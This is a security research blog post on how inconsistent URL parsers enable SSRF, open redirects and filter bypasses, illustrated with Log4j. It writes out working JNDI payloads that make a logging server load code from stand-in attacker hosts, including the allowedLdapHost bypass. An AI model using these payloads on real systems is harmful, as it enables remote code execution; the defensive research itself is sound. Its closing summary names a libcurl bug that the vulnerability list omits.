Harnessing URL parsers: the good, the bad, and the inconsistent

Claroty’s Team82, in conjunction with Snyk’s research team, conducted an extensive research project on URL parsing primitives and discovered major differences in the way many URL parsing libraries and tools process URLs. Today, we’re publishing a research paper that describes our analysis, discusses the differences between parsers, and explains how URL parsing confusion can be abused. We also discovered eight vulnerabilities, which were privately disclosed and patched.

Understanding URL Syntax
In order to understand how differences in URL parsing primitives can be abused, we first need a basic understanding of how URLs are constructed. A URL is built from five different components: scheme, authority, path, query, and fragment. Each component fulfills a different role, whether it dictates the protocol of the request, the host that owns the resource, the exact resource that should be retrieved, and so on.
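For example, here is how Python’s standard urllib.parse module (one of the parsers examined in this research) breaks a URL into these five components; the URL itself is just an illustrative example, and any comparable parser exposes a similar breakdown:

from urllib.parse import urlsplit

# Split an example URL into its five components:
# scheme, authority (netloc), path, query, fragment.
parts = urlsplit("https://example.com:8042/over/there?name=ferret#nose")
print(parts.scheme)    # 'https'
print(parts.netloc)    # 'example.com:8042'  <- the authority
print(parts.path)      # '/over/there'
print(parts.query)     # 'name=ferret'
print(parts.fragment)  # 'nose'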

Over the years, many RFCs have defined URLs, each one making changes in an effort to improve the URL standard. However, the frequency of changes has created major differences between URL parsers, each conforming to a different RFC (in order to remain backwards compatible). Some, in fact, choose to ignore the newer RFCs altogether, instead adopting a URL specification that they believe is more representative of how real URLs should be parsed. This created an environment in which one URL parser could interpret a given URL differently than another, which could lead to serious security issues.

The history of RFCs defining URLs, starting with RFC 1738, written in 1994, and ending with the most recent RFC, RFC 3986, written in 2005.

Recent example: The Log4j allowedLdapHost bypass
To fully understand how dangerous confusion between URL parsing primitives can be, let’s look at a real-world vulnerability that abused these differences. In December 2021, the world was taken by storm by a remote code execution vulnerability in the Log4j library, a popular Java logging library. Due to the popularity of Log4j, millions of servers and applications were affected, forcing administrators to determine where Log4j may exist in their environments and their exposure to proof-of-concept attacks in the wild.

Although we will not fully explain this vulnerability here (it has been covered extensively), the core of the vulnerability stems from the fact that a string controlled by an attacker is evaluated whenever it is logged by an application, which results in a JNDI (Java Naming and Directory Interface) lookup that connects to an attacker-specified server and loads malicious Java code.

A payload triggering this vulnerability could look like this: ${jndi:ldap://attacker.com:1389/a}

If this string were logged by a vulnerable application, it would cause a remote class to be loaded into the current Java context.

Team82’s pre-auth RCE against VMware vCenter ESXi Server, exploiting the Log4j vulnerability.
Due to the popularity of this library and the large number of servers affected, numerous patches and countermeasures were introduced to address this vulnerability. We’ll talk about one countermeasure in particular, which was intended to block any attempt to load classes from a remote source using JNDI.

This particular fix was made inside the JNDI lookup process. Instead of allowing JNDI lookups from arbitrary remote sources, which could lead to remote code execution, JNDI would only allow lookups from a set of whitelisted, predefined hosts, allowedLdapHost, which by default contained only localhost. This means that even if an attacker-supplied entry is evaluated and a JNDI lookup is performed, the lookup will fail if the given host is not in the whitelist. Therefore, a class hosted by an attacker would not be loaded, and the vulnerability would be rendered moot.

However, shortly after this fix, a bypass for this mitigation was found (CVE-2021-45046), which once again enabled remote JNDI lookups and allowed the vulnerability to be exploited to achieve RCE. Let’s analyze the bypass payload:

${jndi:ldap://127.0.0.1#.evilhost.com:1389/a}

As we can see, this payload again contains a URL, but the authority component (host) of the URL looks irregular, containing two different hosts: 127.0.0.1 and evilhost.com. It turns out that is exactly where the bypass lies. The bypass stems from the fact that two different (!) URL parsers were used in the JNDI lookup process: one parser to validate the URL and another to fetch it, and depending on how each parser handles the fragment part (#) of the URL, the authority it extracts changes as well.

In order to validate that the URL’s host is allowed, Java’s URI class was used; it parsed the URL, extracted the host, and checked whether the host is on the whitelist of allowed hosts. And indeed, if we parse this URL using Java’s URI, we find that the host of the URL is 127.0.0.1, which is included in the whitelist. However, on some operating systems (mainly macOS) and under specific configurations, when the JNDI lookup process fetches this URL, it does not attempt to fetch it from 127.0.0.1; instead, it makes a request to 127.0.0.1#.evilhost.com. This means that even though the malicious payload bypasses the allowedLdapHost localhost validation (which is done by the URI parser), it will still try to fetch a class from a remote location.
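As an illustration only (the vulnerable code is Java, not Python), the following sketch mimics the same two-parser mismatch: a fragment-aware parser used for validation, and a hypothetical naive fetcher that carves the authority straight out of the raw string.

from urllib.parse import urlsplit

payload = "ldap://127.0.0.1#.evilhost.com:1389/a"

# Parser 1 (validation): fragment-aware, so the authority stops at '#'.
validated_host = urlsplit(payload).hostname
print(validated_host)   # '127.0.0.1' -> passes a localhost-only whitelist

# Parser 2 (fetching, hypothetical): naively takes everything between '//' and
# the next '/', then strips a trailing ':port'.
authority = payload.split("//", 1)[1].split("/", 1)[0]
naive_host = authority.rsplit(":", 1)[0]
print(naive_host)       # '127.0.0.1#.evilhost.com' -> a remote lookup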

This bypass shows how minor discrepancies between URL parsers can create serious security issues and real vulnerabilities.

Joint Team82-Snyk Research Results

During our analysis, we looked at the following libraries and tools, written in many languages: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), libcurl (cURL), Wget, Chrome (browser), Uri (.NET), URL (Java), URI (Java), parse_url (PHP), url (NodeJS), url-parse (NodeJS), net/url (Go), uri (Ruby), and URI (Perl).

As a result of our analysis, we were able to identify and categorize five different scenarios in which most URL parsers behave unexpectedly (the first two are illustrated in the sketch after this list):

Scheme confusion: A confusion involving URLs with a missing or malformed scheme

Slash confusion: A confusion involving URLs containing an irregular number of slashes

Backslash confusion: A confusion involving URLs containing backslashes (\)

URL-encoded data confusion: A confusion involving URLs containing URL-encoded data

Scheme mixup: A confusion involving parsing a URL belonging to a certain scheme without a scheme-specific parser
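To make the first two categories concrete, here is a minimal sketch using only Python’s urllib; the contrasting behavior described in the comments is how lenient, browser-style parsers commonly behave, not output produced by this snippet.

from urllib.parse import urlsplit

# Scheme confusion: with no scheme, urllib sees no host at all, while many
# lenient parsers (and browsers) would treat 'example.com' as the host.
print(urlsplit("example.com/path").hostname)       # None
print(urlsplit("example.com/path").path)           # 'example.com/path'

# Slash confusion: with an extra slash, urllib returns an empty host and pushes
# 'evil.com' into the path, whereas some tolerant parsers skip the superfluous
# slash and use 'evil.com' as the host.
print(urlsplit("http:///evil.com/path").hostname)  # None
print(urlsplit("http:///evil.com/path").path)      # '/evil.com/path'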

By abusing these inconsistencies, many possible vulnerabilities could arise, ranging from a server-side request forgery (SSRF) vulnerability, which could lead to remote code execution, to an open redirect vulnerability, which could enable a sophisticated phishing attack.

As a result of our research, we identified the following vulnerabilities, which affect different frameworks and even different programming languages. The vulnerabilities below have been fixed, except for those found in unsupported versions of Flask:

  1. Flask-Security (Python, CVE-2021-23385)
  2. Flask-Security-Too (Python, CVE-2021-32618)
  3. Flask-User (Python, CVE-2021-23401)
  4. Flask-Unchained (Python, CVE-2021-23393)
  5. Belledonne’s SIP stack (C, CVE-2021-33056)
  6. Video.js (JavaScript, CVE-2021-23414)
  7. Nagios XI (PHP, CVE-2021-37352)
  8. Clearance (Ruby, CVE-2021-23435)

Recommendations

Many real-world attack scenarios can arise from differences between URL parsing primitives. In order to sufficiently protect your application against vulnerabilities involving URL parsing, it is necessary to understand which parsers are involved in the whole process, whether they are programmatic parsers, external tools, or something else.

After identifying each parser involved, a developer should gain a good understanding of the differences between those parsers, whether it’s their leniency, how they interpret different malformed URLs, or which types of URLs they support.

As always, user-provided URLs should never be blindly trusted; they should first be canonicalized and then validated, with the differences between the parsers in use being an important part of the validation.
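A minimal sketch of that recommendation, assuming a hypothetical allowlist and using a single parser (Python’s urllib) for both validation and any later use of the URL:

from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"example.com"}   # hypothetical allowlist for this sketch

def canonicalize_and_validate(raw_url: str) -> str:
    parts = urlsplit(raw_url.strip())
    if parts.scheme not in ("http", "https"):
        raise ValueError("unsupported scheme")
    if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
        raise ValueError("host not allowed")
    # Re-serialize so downstream code receives exactly the URL that was
    # validated, not the original, possibly ambiguous string.
    return urlunsplit((parts.scheme, parts.netloc, parts.path or "/",
                       parts.query, parts.fragment))

print(canonicalize_and_validate("https://example.com/over/there?name=ferret"))

The important point is that the same parser that validates the host is the one whose output is handed to the rest of the application.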

Download our paper to learn more about exploiting these parsing confusion scenarios, and for a number of recommendations that mitigate the impact of these vulnerabilities if exploited.

Summary:

  • Claroty’s Team82 and the Snyk research team have collaborated on a research paper, available today, that examines confusion in URL parsing.
  • Different libraries parse URLs in their own way, and these inconsistencies can be exploited by attackers.
  • The two teams looked at 16 URL parsing libraries and tools, including: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), libcurl (cURL), Wget, Chrome (browser), Uri (.NET), URL (Java), URI (Java), parse_url (PHP), url (NodeJS), url-parse (NodeJS), net/url (Go), uri (Ruby), and URI (Perl).
  • The article describes five classes of inconsistencies between parsing libraries that can be exploited to cause denial of service conditions, information leaks, and in some circumstances, remote code execution.
  • The five types of inconsistencies are: scheme confusion, slash confusion, backslash confusion, URL-encoded data confusion, and scheme mixup.
  • The Team82-Snyk research collaboration also discovered eight vulnerabilities in web applications and third-party libraries (many of which are written in different programming languages) used by web developers in applications.
  • Among the eight vulnerabilities was a bug in libcurl. The problem was disclosed to the creator of cURL, Daniel Stenberg, who fixed it in the latest version of cURL.
